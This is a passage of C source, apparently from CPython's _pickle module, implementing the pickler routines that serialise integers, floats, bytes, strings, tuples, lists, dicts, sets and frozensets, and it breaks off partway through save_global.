pdata[2] = (unsigned char)((val >> 8) & 0xff);
pdata[3] = (unsigned char)((val >> 16) & 0xff);
pdata[4] = (unsigned char)((val >> 24) & 0xff);
if ((pdata[4] != 0) || (pdata[3] != 0)) {
pdata[0] = BININT;
len = 5;
}
else if (pdata[2] != 0) {
pdata[0] = BININT2;
len = 3;
}
else {
pdata[0] = BININT1;
len = 2;
}
}
else {
sprintf(pdata, "%c%ld\n", INT, val);
len = strlen(pdata);
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
assert(!PyErr_Occurred());
if (self->proto >= 2) {
/* Linear-time pickling. */
size_t nbits;
size_t nbytes;
unsigned char *pdata;
char header[5];
int i;
int sign = _PyLong_Sign(obj);
if (sign == 0) {
header[0] = LONG1;
header[1] = 0; /* It's 0 -- an empty bytestring. */
if (_Pickler_Write(self, header, 2) < 0)
goto error;
return 0;
}
nbits = _PyLong_NumBits(obj);
if (nbits == (size_t)-1 && PyErr_Occurred())
goto error;
/* How many bytes do we need? There are nbits >> 3 full
* bytes of data, and nbits & 7 leftover bits. If there
* are any leftover bits, then we clearly need another
* byte. Wnat's not so obvious is that we *probably*
* need another byte even if there aren't any leftovers:
* the most-significant bit of the most-significant byte
* acts like a sign bit, and it's usually got a sense
* opposite of the one we need. The exception is ints
* of the form -(2**(8*j-1)) for j > 0. Such an int is
* its own 256's-complement, so has the right sign bit
* even without the extra byte. That's a pain to check
* for in advance, though, so we always grab an extra
* byte at the start, and cut it back later if possible.
*/
nbytes = (nbits >> 3) + 1;
if (nbytes > 0x7fffffffL) {
PyErr_SetString(PyExc_OverflowError,
"int too large to pickle");
goto error;
}
repr = PyBytes_FromStringAndSize(NULL, (Py_ssize_t)nbytes);
if (repr == NULL)
goto error;
pdata = (unsigned char *)PyBytes_AS_STRING(repr);
i = _PyLong_AsByteArray((PyLongObject *)obj,
pdata, nbytes,
1 /* little endian */ , 1 /* signed */ );
if (i < 0)
goto error;
/* If the int is negative, this may be a byte more than
* needed. This is so iff the MSB is all redundant sign
* bits.
*/
if (sign < 0 &&
nbytes > 1 &&
pdata[nbytes - 1] == 0xff &&
(pdata[nbytes - 2] & 0x80) != 0) {
nbytes--;
}
if (nbytes < 256) {
header[0] = LONG1;
header[1] = (unsigned char)nbytes;
size = 2;
}
else {
header[0] = LONG4;
size = (Py_ssize_t) nbytes;
for (i = 1; i < 5; i++) {
header[i] = (unsigned char)(size & 0xff);
size >>= 8;
}
size = 5;
}
if (_Pickler_Write(self, header, size) < 0 ||
_Pickler_Write(self, (char *)pdata, (int)nbytes) < 0)
goto error;
}
else {
const char long_op = LONG;
const char *string;
/* proto < 2: write the repr and newline. This is quadratic-time (in
the number of digits), in both directions. We add a trailing 'L'
to the repr, for compatibility with Python 2.x. */
repr = PyObject_Repr(obj);
if (repr == NULL)
goto error;
string = PyUnicode_AsUTF8AndSize(repr, &size);
if (string == NULL)
goto error;
if (_Pickler_Write(self, &long_op, 1) < 0 ||
_Pickler_Write(self, string, size) < 0 ||
_Pickler_Write(self, "L\n", 2) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(repr);
return status;
}
static int
save_float(PicklerObject *self, PyObject *obj)
{
double x = PyFloat_AS_DOUBLE((PyFloatObject *)obj);
if (self->bin) {
char pdata[9];
pdata[0] = BINFLOAT;
if (_PyFloat_Pack8(x, (unsigned char *)&pdata[1], 0) < 0)
return -1;
if (_Pickler_Write(self, pdata, 9) < 0)
return -1;
}
else {
int result = -1;
char *buf = NULL;
char op = FLOAT;
if (_Pickler_Write(self, &op, 1) < 0)
goto done;
buf = PyOS_double_to_string(x, 'r', 0, Py_DTSF_ADD_DOT_0, NULL);
if (!buf) {
PyErr_NoMemory();
goto done;
}
if (_Pickler_Write(self, buf, strlen(buf)) < 0)
goto done;
if (_Pickler_Write(self, "\n", 1) < 0)
goto done;
result = 0;
done:
PyMem_Free(buf);
return result;
}
return 0;
}
/* Perform direct write of the header and payload of the binary object.
The large contiguous data is written directly into the underlying file
object, bypassing the output_buffer of the Pickler. We intentionally
do not insert a protocol 4 frame opcode to make it possible to optimize
file.read calls in the loader.
*/
static int
_Pickler_write_bytes(PicklerObject *self,
const char *header, Py_ssize_t header_size,
const char *data, Py_ssize_t data_size,
PyObject *payload)
{
int bypass_buffer = (data_size >= FRAME_SIZE_TARGET);
int framing = self->framing;
if (bypass_buffer) {
assert(self->output_buffer != NULL);
/* Commit the previous frame. */
if (_Pickler_CommitFrame(self)) {
return -1;
}
/* Disable framing temporarily */
self->framing = 0;
}
if (_Pickler_Write(self, header, header_size) < 0) {
return -1;
}
if (bypass_buffer && self->write != NULL) {
/* Bypass the in-memory buffer to directly stream large data
into the underlying file object. */
PyObject *result, *mem = NULL;
/* Dump the output buffer to the file. */
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
/* Stream write the payload into the file without going through the
output buffer. */
if (payload == NULL) {
/* TODO: It would be better to use a memoryview with a linked
original string if this is possible. */
payload = mem = PyBytes_FromStringAndSize(data, data_size);
if (payload == NULL) {
return -1;
}
}
result = PyObject_CallFunctionObjArgs(self->write, payload, NULL);
Py_XDECREF(mem);
if (result == NULL) {
return -1;
}
Py_DECREF(result);
/* Reinitialize the buffer for subsequent calls to _Pickler_Write. */
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
else {
if (_Pickler_Write(self, data, data_size) < 0) {
return -1;
}
}
/* Re-enable framing for subsequent calls to _Pickler_Write. */
self->framing = framing;
return 0;
}
static int
save_bytes(PicklerObject *self, PyObject *obj)
{
if (self->proto < 3) {
/* Older pickle protocols do not have an opcode for pickling bytes
objects. Therefore, we need to fake the copy protocol (i.e.,
the __reduce__ method) to permit bytes object unpickling.
Here we use a hack to be compatible with Python 2. Since in Python
2 'bytes' is just an alias for 'str' (which has different
parameters than the actual bytes object), we use codecs.encode
to create the appropriate 'str' object when unpickled using
Python 2 *and* the appropriate 'bytes' object when unpickled
using Python 3. Again this is a hack and we don't need to do this
with newer protocols. */
PyObject *reduce_value = NULL;
int status;
if (PyBytes_GET_SIZE(obj) == 0) {
reduce_value = Py_BuildValue("(O())", (PyObject*)&PyBytes_Type);
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyObject *unicode_str =
PyUnicode_DecodeLatin1(PyBytes_AS_STRING(obj),
PyBytes_GET_SIZE(obj),
"strict");
_Py_IDENTIFIER(latin1);
if (unicode_str == NULL)
return -1;
reduce_value = Py_BuildValue("(O(OO))",
st->codecs_encode, unicode_str,
_PyUnicode_FromId(&PyId_latin1));
Py_DECREF(unicode_str);
}
if (reduce_value == NULL)
return -1;
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
else {
Py_ssize_t size;
char header[9];
Py_ssize_t len;
size = PyBytes_GET_SIZE(obj);
if (size < 0)
return -1;
if (size <= 0xff) {
header[0] = SHORT_BINBYTES;
header[1] = (unsigned char)size;
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINBYTES;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINBYTES8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a bytes object larger than 4 GiB");
return -1; /* string too large */
}
if (_Pickler_write_bytes(self, header, len,
PyBytes_AS_STRING(obj), size, obj) < 0)
{
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
}
/* A copy of PyUnicode_EncodeRawUnicodeEscape() that also translates
backslash and newline characters to \uXXXX escapes. */
static PyObject *
raw_unicode_escape(PyObject *obj)
{
char *p;
Py_ssize_t i, size;
void *data;
unsigned int kind;
_PyBytesWriter writer;
if (PyUnicode_READY(obj))
return NULL;
_PyBytesWriter_Init(&writer);
size = PyUnicode_GET_LENGTH(obj);
data = PyUnicode_DATA(obj);
kind = PyUnicode_KIND(obj);
p = _PyBytesWriter_Alloc(&writer, size);
if (p == NULL)
goto error;
writer.overallocate = 1;
for (i=0; i < size; i++) {
Py_UCS4 ch = PyUnicode_READ(kind, data, i);
/* Map 32-bit characters to '\Uxxxxxxxx' */
if (ch >= 0x10000) {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 10-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'U';
*p++ = Py_hexdigits[(ch >> 28) & 0xf];
*p++ = Py_hexdigits[(ch >> 24) & 0xf];
*p++ = Py_hexdigits[(ch >> 20) & 0xf];
*p++ = Py_hexdigits[(ch >> 16) & 0xf];
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Map 16-bit characters, '\\' and '\n' to '\uxxxx' */
else if (ch >= 256 || ch == '\\' || ch == '\n') {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 6-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'u';
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Copy everything else as-is */
else
*p++ = (char) ch;
}
return _PyBytesWriter_Finish(&writer, p);
error:
_PyBytesWriter_Dealloc(&writer);
return NULL;
}
static int
write_unicode_binary(PicklerObject *self, PyObject *obj)
{
char header[9];
Py_ssize_t len;
PyObject *encoded = NULL;
Py_ssize_t size;
const char *data;
if (PyUnicode_READY(obj))
return -1;
data = PyUnicode_AsUTF8AndSize(obj, &size);
if (data == NULL) {
/* Issue #8383: for strings with lone surrogates, fallback on the
"surrogatepass" error handler. */
PyErr_Clear();
encoded = PyUnicode_AsEncodedString(obj, "utf-8", "surrogatepass");
if (encoded == NULL)
return -1;
data = PyBytes_AS_STRING(encoded);
size = PyBytes_GET_SIZE(encoded);
}
assert(size >= 0);
if (size <= 0xff && self->proto >= 4) {
header[0] = SHORT_BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINUNICODE8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a string larger than 4GiB");
Py_XDECREF(encoded);
return -1;
}
if (_Pickler_write_bytes(self, header, len, data, size, encoded) < 0) {
Py_XDECREF(encoded);
return -1;
}
Py_XDECREF(encoded);
return 0;
}
static int
save_unicode(PicklerObject *self, PyObject *obj)
{
if (self->bin) {
if (write_unicode_binary(self, obj) < 0)
return -1;
}
else {
PyObject *encoded;
Py_ssize_t size;
const char unicode_op = UNICODE;
encoded = raw_unicode_escape(obj);
if (encoded == NULL)
return -1;
if (_Pickler_Write(self, &unicode_op, 1) < 0) {
Py_DECREF(encoded);
return -1;
}
size = PyBytes_GET_SIZE(encoded);
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded), size) < 0) {
Py_DECREF(encoded);
return -1;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* A helper for save_tuple. Push the len elements in tuple t on the stack. */
static int
store_tuple_elements(PicklerObject *self, PyObject *t, Py_ssize_t len)
{
Py_ssize_t i;
assert(PyTuple_Size(t) == len);
for (i = 0; i < len; i++) {
PyObject *element = PyTuple_GET_ITEM(t, i);
if (element == NULL)
return -1;
if (save(self, element, 0) < 0)
return -1;
}
return 0;
}
/* Tuples are ubiquitous in the pickle protocols, so many techniques are
* used across protocols to minimize the space needed to pickle them.
* Tuples are also the only builtin immutable type that can be recursive
* (a tuple can be reached from itself), and that requires some subtle
* magic so that it works in all cases. IOW, this is a long routine.
*/
static int
save_tuple(PicklerObject *self, PyObject *obj)
{
Py_ssize_t len, i;
const char mark_op = MARK;
const char tuple_op = TUPLE;
const char pop_op = POP;
const char pop_mark_op = POP_MARK;
const char len2opcode[] = {EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3};
if ((len = PyTuple_Size(obj)) < 0)
return -1;
if (len == 0) {
char pdata[2];
if (self->proto) {
pdata[0] = EMPTY_TUPLE;
len = 1;
}
else {
pdata[0] = MARK;
pdata[1] = TUPLE;
len = 2;
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* The tuple isn't in the memo now. If it shows up there after
* saving the tuple elements, the tuple must be recursive, in
* which case we'll pop everything we put on the stack, and fetch
* its value from the memo.
*/
if (len <= 3 && self->proto >= 2) {
/* Use TUPLE{1,2,3} opcodes. */
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the len elements */
for (i = 0; i < len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, len2opcode + len, 1) < 0)
return -1;
}
goto memoize;
}
/* proto < 2 and len > 0, or proto >= 2 and len > 3.
* Generate MARK e1 e2 ... TUPLE
*/
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the stack stuff we pushed */
if (self->bin) {
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
}
else {
/* Note that we pop one more than len, to remove
* the MARK too.
*/
for (i = 0; i <= len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
}
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, &tuple_op, 1) < 0)
return -1;
}
memoize:
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* iter is an iterator giving items, and we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, <0 on error.
*/
static int
batch_list(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char append_op = APPEND;
const char appends_op = APPENDS;
assert(iter != NULL);
/* XXX: I think this function could be made faster by avoiding the
iterator interface and fetching objects directly from list using
PyList_GET_ITEM.
*/
if (self->proto == 0) {
/* APPENDS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
i = save(self, obj, 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, firstitem, 0) < 0)
goto error;
if (_Pickler_Write(self, &append_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, APPENDS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, firstitem, 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (save(self, obj, 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_list() above, specialized for lists (with no
* support for list subclasses). Like batch_list(), we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, -1 on error.
*
* This version is considerably faster than batch_list(), if less general.
*
* Note that this only works for protocols > 0.
*/
static int
batch_list_exact(PicklerObject *self, PyObject *obj)
{
PyObject *item = NULL;
Py_ssize_t this_batch, total;
const char append_op = APPEND;
const char appends_op = APPENDS;
const char mark_op = MARK;
assert(obj != NULL);
assert(self->proto > 0);
assert(PyList_CheckExact(obj));
if (PyList_GET_SIZE(obj) == 1) {
item = PyList_GET_ITEM(obj, 0);
if (save(self, item, 0) < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
total = 0;
do {
this_batch = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (total < PyList_GET_SIZE(obj)) {
item = PyList_GET_ITEM(obj, total);
if (save(self, item, 0) < 0)
return -1;
total++;
if (++this_batch == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &appends_op, 1) < 0)
return -1;
} while (total < PyList_GET_SIZE(obj));
return 0;
}
static int
save_list(PicklerObject *self, PyObject *obj)
{
char header[3];
Py_ssize_t len;
int status = 0;
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty list. */
if (self->bin) {
header[0] = EMPTY_LIST;
len = 1;
}
else {
header[0] = MARK;
header[1] = LIST;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
/* Get list length, and bow out early if empty. */
if ((len = PyList_Size(obj)) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (len != 0) {
/* Materialize the list elements. */
if (PyList_CheckExact(obj) && self->proto > 0) {
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_list_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
PyObject *iter = PyObject_GetIter(obj);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_list(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
/* iter is an iterator giving (key, value) pairs, and we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, <0 on error.
*
* This is very much like batch_list(). The difference between saving
* elements directly, and picking apart two-tuples, is so long-winded at
* the C level, though, that attempts to combine these routines were too
* ugly to bear.
*/
static int
batch_dict(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(iter != NULL);
if (self->proto == 0) {
/* SETITEMS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
return -1;
}
i = save(self, PyTuple_GET_ITEM(obj, 0), 0);
if (i >= 0)
i = save(self, PyTuple_GET_ITEM(obj, 1), 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
if (!PyTuple_Check(firstitem) || PyTuple_Size(firstitem) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, SETITEMS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 0), 0) < 0)
goto error;
if (save(self, PyTuple_GET_ITEM(firstitem, 1), 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
/* Fetch and save up to BATCHSIZE items */
while (obj) {
if (!PyTuple_Check(obj) || PyTuple_Size(obj) != 2) {
PyErr_SetString(PyExc_TypeError, "dict items "
"iterator must return 2-tuples");
goto error;
}
if (save(self, PyTuple_GET_ITEM(obj, 0), 0) < 0 ||
save(self, PyTuple_GET_ITEM(obj, 1), 0) < 0)
goto error;
Py_CLEAR(obj);
n += 1;
if (n == BATCHSIZE)
break;
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
break;
}
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
goto error;
} while (n == BATCHSIZE);
return 0;
error:
Py_XDECREF(firstitem);
Py_XDECREF(obj);
return -1;
}
/* This is a variant of batch_dict() above that specializes for dicts, with no
* support for dict subclasses. Like batch_dict(), we batch up chunks of
* MARK key value ... key value SETITEMS
* opcode sequences. Calling code should have arranged to first create an
* empty dict, or dict-like object, for the SETITEMS to operate on.
* Returns 0 on success, -1 on error.
*
* Note that this currently doesn't work for protocol 0.
*/
static int
batch_dict_exact(PicklerObject *self, PyObject *obj)
{
PyObject *key = NULL, *value = NULL;
int i;
Py_ssize_t dict_size, ppos = 0;
const char mark_op = MARK;
const char setitem_op = SETITEM;
const char setitems_op = SETITEMS;
assert(obj != NULL && PyDict_CheckExact(obj));
assert(self->proto > 0);
dict_size = PyDict_GET_SIZE(obj);
/* Special-case len(d) == 1 to save space. */
if (dict_size == 1) {
PyDict_Next(obj, &ppos, &key, &value);
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (_Pickler_Write(self, &setitem_op, 1) < 0)
return -1;
return 0;
}
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (PyDict_Next(obj, &ppos, &key, &value)) {
if (save(self, key, 0) < 0)
return -1;
if (save(self, value, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &setitems_op, 1) < 0)
return -1;
if (PyDict_GET_SIZE(obj) != dict_size) {
PyErr_Format(
PyExc_RuntimeError,
"dictionary changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
static int
save_dict(PicklerObject *self, PyObject *obj)
{
PyObject *items, *iter;
char header[3];
Py_ssize_t len;
int status = 0;
assert(PyDict_Check(obj));
if (self->fast && !fast_save_enter(self, obj))
goto error;
/* Create an empty dict. */
if (self->bin) {
header[0] = EMPTY_DICT;
len = 1;
}
else {
header[0] = MARK;
header[1] = DICT;
len = 2;
}
if (_Pickler_Write(self, header, len) < 0)
goto error;
if (memo_put(self, obj) < 0)
goto error;
if (PyDict_GET_SIZE(obj)) {
/* Save the dict items. */
if (PyDict_CheckExact(obj) && self->proto > 0) {
/* We can take certain shortcuts if we know this is a dict and
not a dict subclass. */
if (Py_EnterRecursiveCall(" while pickling an object"))
goto error;
status = batch_dict_exact(self, obj);
Py_LeaveRecursiveCall();
} else {
_Py_IDENTIFIER(items);
items = _PyObject_CallMethodId(obj, &PyId_items, NULL);
if (items == NULL)
goto error;
iter = PyObject_GetIter(items);
Py_DECREF(items);
if (iter == NULL)
goto error;
if (Py_EnterRecursiveCall(" while pickling an object")) {
Py_DECREF(iter);
goto error;
}
status = batch_dict(self, iter);
Py_LeaveRecursiveCall();
Py_DECREF(iter);
}
}
if (0) {
error:
status = -1;
}
if (self->fast && !fast_save_leave(self, obj))
status = -1;
return status;
}
static int
save_set(PicklerObject *self, PyObject *obj)
{
PyObject *item;
int i;
Py_ssize_t set_size, ppos = 0;
Py_hash_t hash;
const char empty_set_op = EMPTY_SET;
const char mark_op = MARK;
const char additems_op = ADDITEMS;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PySet_Type, items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &empty_set_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
set_size = PySet_GET_SIZE(obj);
if (set_size == 0)
return 0; /* nothing to do */
/* Write in batches of BATCHSIZE. */
do {
i = 0;
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
while (_PySet_NextEntry(obj, &ppos, &item, &hash)) {
if (save(self, item, 0) < 0)
return -1;
if (++i == BATCHSIZE)
break;
}
if (_Pickler_Write(self, &additems_op, 1) < 0)
return -1;
if (PySet_GET_SIZE(obj) != set_size) {
PyErr_Format(
PyExc_RuntimeError,
"set changed size during iteration");
return -1;
}
} while (i == BATCHSIZE);
return 0;
}
static int
save_frozenset(PicklerObject *self, PyObject *obj)
{
PyObject *iter;
const char mark_op = MARK;
const char frozenset_op = FROZENSET;
if (self->fast && !fast_save_enter(self, obj))
return -1;
if (self->proto < 4) {
PyObject *items;
PyObject *reduce_value;
int status;
items = PySequence_List(obj);
if (items == NULL) {
return -1;
}
reduce_value = Py_BuildValue("(O(O))", (PyObject*)&PyFrozenSet_Type,
items);
Py_DECREF(items);
if (reduce_value == NULL) {
return -1;
}
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
iter = PyObject_GetIter(obj);
if (iter == NULL) {
return -1;
}
for (;;) {
PyObject *item;
item = PyIter_Next(iter);
if (item == NULL) {
if (PyErr_Occurred()) {
Py_DECREF(iter);
return -1;
}
break;
}
if (save(self, item, 0) < 0) {
Py_DECREF(item);
Py_DECREF(iter);
return -1;
}
Py_DECREF(item);
}
Py_DECREF(iter);
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_mark_op = POP_MARK;
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
if (_Pickler_Write(self, &frozenset_op, 1) < 0)
return -1;
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
static int
fix_imports(PyObject **module_name, PyObject **global_name)
{
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
key = PyTuple_Pack(2, *module_name, *global_name);
if (key == NULL)
return -1;
item = PyDict_GetItemWithError(st->name_mapping_3to2, key);
Py_DECREF(key);
if (item) {
PyObject *fixed_module_name;
PyObject *fixed_global_name;
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be 2-tuples, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
fixed_module_name = PyTuple_GET_ITEM(item, 0);
fixed_global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(fixed_module_name) ||
!PyUnicode_Check(fixed_global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be pairs of str, not (%.200s, %.200s)",
Py_TYPE(fixed_module_name)->tp_name,
Py_TYPE(fixed_global_name)->tp_name);
return -1;
}
Py_CLEAR(*module_name);
Py_CLEAR(*global_name);
Py_INCREF(fixed_module_name);
Py_INCREF(fixed_global_name);
*module_name = fixed_module_name;
*global_name = fixed_global_name;
return 0;
}
else if (PyErr_Occurred()) {
return -1;
}
item = PyDict_GetItemWithError(st->import_mapping_3to2, *module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING values "
"should be strings, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
Py_INCREF(item);
Py_XSETREF(*module_name, item);
}
else if (PyErr_Occurred()) {
return -1;
}
return 0;
}
static int
save_global(PicklerObject *self, PyObject *obj, PyObject *name)
{
PyObject *global_name = NULL;
PyObject *module_name = NULL;
PyObject *module = NULL;
PyObject *parent = NULL;
PyObject *dotted_path = NULL;
PyObject *lastname = NULL;
PyObject *cls;
PickleState *st = _Pickle_GetGlobalState();
int status = 0;
_Py_IDENTIFIER(__name__);
_Py_IDENTIFIER(__qualname__);
const char global_op = GLOBAL;
if (name) {
Py_INCREF(name);
global_name = name;
}
else {
if (_PyObject_LookupAttrId(obj, &PyId___qualname__, &global_name) < 0)
goto error;
if (global_name == NULL) {
global_name = _PyObject_GetAttrId(obj, &PyId___name__);
if (global_name == NULL)
goto error;
}
}
dotted_path = get_dotted_path(module, global_name);
if (dotted_path == NULL)
goto error;
module_name = whichmodule(obj, dotted_path);
if (module_name == NULL)
goto error;
